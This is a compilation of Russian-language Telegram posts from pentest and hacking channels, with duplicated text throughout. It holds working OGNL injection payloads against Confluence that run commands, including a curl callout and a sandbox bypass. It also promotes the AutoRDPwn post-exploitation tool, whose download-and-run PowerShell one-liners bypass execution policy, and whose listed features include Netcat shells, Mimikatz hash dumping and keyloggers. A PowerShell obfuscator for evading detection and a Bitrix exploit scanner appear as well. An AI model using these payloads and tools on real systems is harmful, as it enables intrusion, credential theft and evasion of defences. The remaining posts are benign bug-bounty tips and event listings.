Forwarded from Ralf Hacker Channel (Ralf Hacker)
Вот смотрю ещё один свежий материал по фишингу от TrustedSec. Главная идея: с помощью HTML инъекции отправить сообщение с доверенного домена.
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
TrustedSec
Crafting Emails with HTML Injection
If an HTML-enabled email is sent that contains user input, it can be vulnerable to HTML injection, which can allow an attacker to change the entire body…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤🔥2🌚1
Forwarded from Monkey Hacker
OGNL and sandboxes
Существует такая вещь в
Спустя время, выяснилось, что через😻
Разберу пару вулн в
При рендеринге странице, есть спрятанный параметр😑
Именно он дает нам возможность, поиграться с
Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень(не забудь энкодить) 👍
Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Дальше, один из экспертов решил пойти глубже и начал смотреть
Самое вкусное было найдено в
Всем удачи😇
Существует такая вещь в
Java, как Object Graph Notation Language (OGNL) еще один Expression language. Чаще всего данный фреймворк можно заметить в продуктах Apache и Attlasian OGNL вызывает методы несколько иначе, чем Java, поскольку OGNL интерпретируется и должен выбрать нужный метод во время выполнения программы, не имея никакой дополнительной информации о типе, кроме собственно предоставленных аргументов. OGNL всегда выбирает наиболее специфичный метод, типы которого соответствуют заданным аргументамСпустя время, выяснилось, что через
OGNL можно также сделать Command Injection. Метод эксплуатации чем-то напоминает SSTI Разберу пару вулн в
Confluence. Проблемы появлялись из-за isSafeExpressionПри рендеринге странице, есть спрятанный параметр
queryString Именно он дает нам возможность, поиграться с
Java queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl your-domain.com\u0022)}%2b\u0027Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Qualys-Response",#a))}Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Class, вместо class. Или использовать конкатенацию строк.Дальше, один из экспертов решил пойти глубже и начал смотреть
Abstract Syntax Tree (AST). Как оказалось, AST давал много векторов, для обхода ограниченийСамое вкусное было найдено в
BeanMap, который позволял сделать, уже полноценный байпасс(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))Всем удачи
Please open Telegram to view this post
VIEW IN TELEGRAM
👾7⚡1
Книга Хакерство. Физические атаки с использованием хакерских устройств
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
P.S. предвижу холивары на тему, "где электронная версия?" В ближайшее время её ждать не стоит, т.к. это требование издательства, а не автора.
#book
💬 Канал | 💬 Канал автора книги
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤4👾1
Forwarded from KazDevOps
Секреты регулярно просачиваются в конвейеры CI/CD, так как рабочие процессы требуют от разработчиков учетных данных для сторонних ресурсов, с которыми взаимодействует их конвейер.
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
👍10🆒2
Forwarded from AKTIV.CONSULTING
Ознакомиться с рейтингом уязвимостей
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍2🆒2
Quick-tricks
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
Для получения дополнительной информации о команде используйте команду
💬 Канал | 💻 Github
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
go install github.com/indigo-sadland/quick-tricks@latest
Функционал:quick-tricks [command]
help Справка о любой командеquick Запуск всех быстрых модулей ('recon', 'lfi', 'redirect', 'spoofing' и 'xss')lfi Модуль проверяет наличие конечных точек, уязвимых к Local File Inclusion.rce Модуль пытается эксплуатировать уязвимые компоненты целевого Битрикса.recon Модуль позволяет найти конечные точки страницы входа в систему, раскрыть локальный путь и лицензионный ключ.redirect Модуль проверяет конечные точки, уязвимые к Open Redirect.spoofing Модуль проверяет цель на возможность атаки Content Spoofing.ssrf Модуль позволяет проверить, уязвима ли цель к SSRF.xss Модуль проверяет конечные точки цели, которые потенциально могут быть уязвимы для XSS. (постоянно фолзы, не советую использовать)Для получения дополнительной информации о команде используйте команду
quick-tricks [command] --help
#bitrixPlease open Telegram to view this post
VIEW IN TELEGRAM
❤🔥11👍4
Forwarded from Positive Events
Обещали — публикуем! 👀
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
👍4
Это powershell фреймворк для постэксплуатации, предназначенный в первую очередь для автоматизации Shadow-RDP атаки на компьютеры под управлением Microsoft Windows. Данная уязвимость позволяет удаленному злоумышленнику просматривать сессию своей жертвы без ее ведома и даже управлять удаленно.
Благодаря дополнительным модулям можно получить удаленный shell через Netcat, сдампить хэши с помощью Mimikatz, загрузить удаленный кейлоггер и многое другое. И все это с помощью интуитивно понятного меню.
Эта тулза может использоваться локально, удаленно или для pivoting'а между серверами.
На системе должен быть PowerShell 4.0+
-admin / -noadmin— явное указание прав доступа для запуска атак;
-nogui— отключает загрузку меню и некоторых цветов, дабы гарантировать общую работоспособность;
-lang— выбор языка интерфейса. [English, Spanish, French, German, Italian, Russian or Portuguese];
-option— выбор типа атаки;
-shadow— выбираем следить или контролировать удаленную машину;
-createuser— не обязательный параметр, который позволяет создаст пользователя
AutoRDPwn:AutoRDPwn на атакуемой машине;-noclean- не обязательный параметр, который отключит автоматический откат параметров после окончания атаки
Дефолтый запуск:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Запуск сразу с параметрами:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
#windows #pentest #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8⚡3
Простой и мощный обфускатор скриптов PowerShell. Этот инструмент позволяет автоматизировать процесс обфускации любого сценария, написанного на PowerShell, с помощью различных техник. Вы можете использовать любую из них по отдельности, вместе или все вместе последовательно в среде Windows или Linux.
Обязательно наличие PowerShell 4.0+. Также для полного функционала требуется Python 3.*
Установка:
git clone https://github.com/JoelGMSec/Invoke-Stealth.gitограниченная версия:
powershell iwr -useb https://darkbyte.net/invoke-stealth.php -outfile Invoke-Stealth.ps1
Использование:.\Invoke-Stealth.ps1 -help
.\Invoke-Stealth.ps1 script.ps1 -technique ChimeraВ скрипте содержиться 5+1 техник обфускации PowerShell сценариев:
Chameleon: подстановка строк и конкатенация переменныхBetterXencrypt: Сжатие и шифрование с помощью случайных итерацийPyFuscation: Обфускация функций, переменных и параметровReverseB64: Кодирование в base64 и обратное кодирование во избежание обнаруженияPSObfuscation: Преобразование содержимого в байты и кодирование с помощью GzipТакже можно применить все техники сразу на скрипт, но учитывайте, что стабильность скрипта может снижаться из-за большого кол-ва итераций обфускации.
#windows #pentest #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍3❤2
Forwarded from #bugbountytips
100 (very) short bug bounty rules:
1/ Spend at least 30 minutes on a new target
2/ Look for "No"s
3/ Use Italics Tags in your inputs instead of XSS payloads
4/ Focus on SaaS apps that are multi-tenant
5/ Buy Burp Pro
6/ On a new target go straight to the User Management section
7/ See if inviting an existing user to your org exposes their name
8/ See if inviting an existing user removes them from their own org
9/ If the scope has a wildcard, use subfinder to find subdomains
10/ Run HTTPX on the list of subdomains to narrow down alive targets
11/ On an app you're not familiar with, use it like a normal user first
12/ If the docs say you can't do X, but you can do X then you have a bug
13/ Use match & replace rules to find new endpoints
14/ Budget time into your week specifically for hacking
15/ Give yourself a no-bug time limit. I do 3 hours.
16/ Go back to old dupes and see if you can still reproduce.
17/ Look for "+2" in your reputation log to find dupes that should be now.
18/Ask for help from other hackers
19/ Make your report a conversation, not a sales pitch
20/ Accept & expect that dupes will happen
21/ File & Forget
22/ If an endpoint has "api/v2/", try "api/v1/"
23/ If an endpoint has "api/v2", try removing the "v2" altogether
24/ 6 $1000 Mediums pay more than 1 $5,000 crit. Don't ignore any bugs
25/ Lows are still bugs that should be filed
26/ Be kind to your triager
27/ Say "thank you" when you get a bounty
28/ If an app uses UUIDs, you can still look for IDORs. Just set "AC:H".
29/ If UUID IDORs exist, then look for an endpoint that exposes UUIDs
30/ Pin your success on whether your followed your plan, not if you found bugs
31/ A program that has a lot of hackers doesn't mean there isn't low-hanging fruit
32/ Going deep _will_ payoff
33/ Working with new hackers will payoff in dividends
34/ Don't be jealous
35/ Bug Bounty income isn't consistent. Be okay with peaks & valleys for your own sanity
36/ If you find a bug that's OOS, still ask the customer if they care
37/ There's no end. Enjoy the journey
38/ Have a hobby that's not related to hacking
39/ Have friends that don't hack
40/ Figure out what time of day you hack the best. Late nights aren't for me.
41/ Spend that extra 2 minutes to make your report look/read nice
42/ "Subscribe" to programs that pay well and have good scope
43/ Don't whine on Twitter about a single report. Or at all for that matter.
44/ IDORs and Privilege Escalations are a great place to start
45/ Unmet expectations lead to disappointment
46/ Teach someone else how to hack
47/ Time spent reading/learning is time-well spent
48/ Focus on programs that you actually use in your day-to-day
49/ Establish a relationship with the program
50/ Try asking the program what types of bugs they want to see
#bugbountytips
1/ Spend at least 30 minutes on a new target
2/ Look for "No"s
3/ Use Italics Tags in your inputs instead of XSS payloads
4/ Focus on SaaS apps that are multi-tenant
5/ Buy Burp Pro
6/ On a new target go straight to the User Management section
7/ See if inviting an existing user to your org exposes their name
8/ See if inviting an existing user removes them from their own org
9/ If the scope has a wildcard, use subfinder to find subdomains
10/ Run HTTPX on the list of subdomains to narrow down alive targets
11/ On an app you're not familiar with, use it like a normal user first
12/ If the docs say you can't do X, but you can do X then you have a bug
13/ Use match & replace rules to find new endpoints
14/ Budget time into your week specifically for hacking
15/ Give yourself a no-bug time limit. I do 3 hours.
16/ Go back to old dupes and see if you can still reproduce.
17/ Look for "+2" in your reputation log to find dupes that should be now.
18/Ask for help from other hackers
19/ Make your report a conversation, not a sales pitch
20/ Accept & expect that dupes will happen
21/ File & Forget
22/ If an endpoint has "api/v2/", try "api/v1/"
23/ If an endpoint has "api/v2", try removing the "v2" altogether
24/ 6 $1000 Mediums pay more than 1 $5,000 crit. Don't ignore any bugs
25/ Lows are still bugs that should be filed
26/ Be kind to your triager
27/ Say "thank you" when you get a bounty
28/ If an app uses UUIDs, you can still look for IDORs. Just set "AC:H".
29/ If UUID IDORs exist, then look for an endpoint that exposes UUIDs
30/ Pin your success on whether your followed your plan, not if you found bugs
31/ A program that has a lot of hackers doesn't mean there isn't low-hanging fruit
32/ Going deep _will_ payoff
33/ Working with new hackers will payoff in dividends
34/ Don't be jealous
35/ Bug Bounty income isn't consistent. Be okay with peaks & valleys for your own sanity
36/ If you find a bug that's OOS, still ask the customer if they care
37/ There's no end. Enjoy the journey
38/ Have a hobby that's not related to hacking
39/ Have friends that don't hack
40/ Figure out what time of day you hack the best. Late nights aren't for me.
41/ Spend that extra 2 minutes to make your report look/read nice
42/ "Subscribe" to programs that pay well and have good scope
43/ Don't whine on Twitter about a single report. Or at all for that matter.
44/ IDORs and Privilege Escalations are a great place to start
45/ Unmet expectations lead to disappointment
46/ Teach someone else how to hack
47/ Time spent reading/learning is time-well spent
48/ Focus on programs that you actually use in your day-to-day
49/ Establish a relationship with the program
50/ Try asking the program what types of bugs they want to see
#bugbountytips
Forwarded from #bugbountytips
51/ Look at a programs leaderboard to see who you should collab with
52/ When collaborating, an even bounty split eliminates hassle
53/ Take a break when you stop having fun
54/ At an LHE, start hacking ahead of time
55/ Look for programs that are active in resolving reports
56/ Look for programs that haven't awarded a lot recently
57/ Look for programs that have collaboration enabled
58/ Look for programs that don't list out a bunch of known issues
59/ Look for programs that have a history of adding new scope
60/ Change your strategy if you've gone a while without a finding
61/ If you're on a roll, keep doing what you're doing
62/ But don't let success keep you from evolving/growing
63/ Compare yourself against yourself from last year
64/ Maintain online presence for new opportunities
65/ Be thankful for failure
66/ Read disclosed reports
67/ Focus on one program at a time. Cycle if you get bored.
68/ Don't spray XSS payloads everywhere
69/ If possible, work at a company that has a BBP
70/ Spend bounty money on tools that will generate more bounties
71/ Budget a specific amount of your bounties for fun. And stick to it.
72/ When hacking a store, don't be afraid to make small purchases
73/ Look for changes in JS files to know when there may be new functionality
74/ Look for references to subdomains in a company's GH repos
75/ Look for references to subdomains in employee's GH repos
76/ If the app uses Intercom, try booting it with another email
77/ Look for second-degree IDORs
78/ SSRFs exist when the app makes any external request. Look for these requests.
79/ Look for actuator endpoints
80/ Find hackers that hack differently than you.
81/ Try hacking in a different room of the house
82/ Try hacking at a different location altogether
83/ If you find the same bug on different endpoints, file as different bugs
84/ Try always having some pending bugs in your pipeline
85/ Break your yearly bounty goal into monthly goals
86/ Know when a bounty isn't worth fighting over
87/ Push back gently when a report gets downgraded
88/ Use the leaderboard as motivation, not as comparison
89/ Don't re-invent the wheel when a tool exists
90/ Don't be afraid to build the wheel if the tool doesn't
91/ Try collabing in real time over video chat
92/ Always ask why something works the way it does
93/ When collabing, don't be afraid to be the underperformer
94/ When collabing, don't get salty about being the overperformer
95/ Use mediation, but use it sparingly
96/ Be generous with your earnings
97/ Hack for fun, not for a paycheck
98/ LHEs are a privilege, not an expectation
99/ Programs are your friend, not your adversary. Work with them
100/ The platform is your friend, not your adversary. Work with them
credit by @ArchAngelDDay
#bugbountytips
52/ When collaborating, an even bounty split eliminates hassle
53/ Take a break when you stop having fun
54/ At an LHE, start hacking ahead of time
55/ Look for programs that are active in resolving reports
56/ Look for programs that haven't awarded a lot recently
57/ Look for programs that have collaboration enabled
58/ Look for programs that don't list out a bunch of known issues
59/ Look for programs that have a history of adding new scope
60/ Change your strategy if you've gone a while without a finding
61/ If you're on a roll, keep doing what you're doing
62/ But don't let success keep you from evolving/growing
63/ Compare yourself against yourself from last year
64/ Maintain online presence for new opportunities
65/ Be thankful for failure
66/ Read disclosed reports
67/ Focus on one program at a time. Cycle if you get bored.
68/ Don't spray XSS payloads everywhere
69/ If possible, work at a company that has a BBP
70/ Spend bounty money on tools that will generate more bounties
71/ Budget a specific amount of your bounties for fun. And stick to it.
72/ When hacking a store, don't be afraid to make small purchases
73/ Look for changes in JS files to know when there may be new functionality
74/ Look for references to subdomains in a company's GH repos
75/ Look for references to subdomains in employee's GH repos
76/ If the app uses Intercom, try booting it with another email
77/ Look for second-degree IDORs
78/ SSRFs exist when the app makes any external request. Look for these requests.
79/ Look for actuator endpoints
80/ Find hackers that hack differently than you.
81/ Try hacking in a different room of the house
82/ Try hacking at a different location altogether
83/ If you find the same bug on different endpoints, file as different bugs
84/ Try always having some pending bugs in your pipeline
85/ Break your yearly bounty goal into monthly goals
86/ Know when a bounty isn't worth fighting over
87/ Push back gently when a report gets downgraded
88/ Use the leaderboard as motivation, not as comparison
89/ Don't re-invent the wheel when a tool exists
90/ Don't be afraid to build the wheel if the tool doesn't
91/ Try collabing in real time over video chat
92/ Always ask why something works the way it does
93/ When collabing, don't be afraid to be the underperformer
94/ When collabing, don't get salty about being the overperformer
95/ Use mediation, but use it sparingly
96/ Be generous with your earnings
97/ Hack for fun, not for a paycheck
98/ LHEs are a privilege, not an expectation
99/ Programs are your friend, not your adversary. Work with them
100/ The platform is your friend, not your adversary. Work with them
credit by @ArchAngelDDay
#bugbountytips
👍4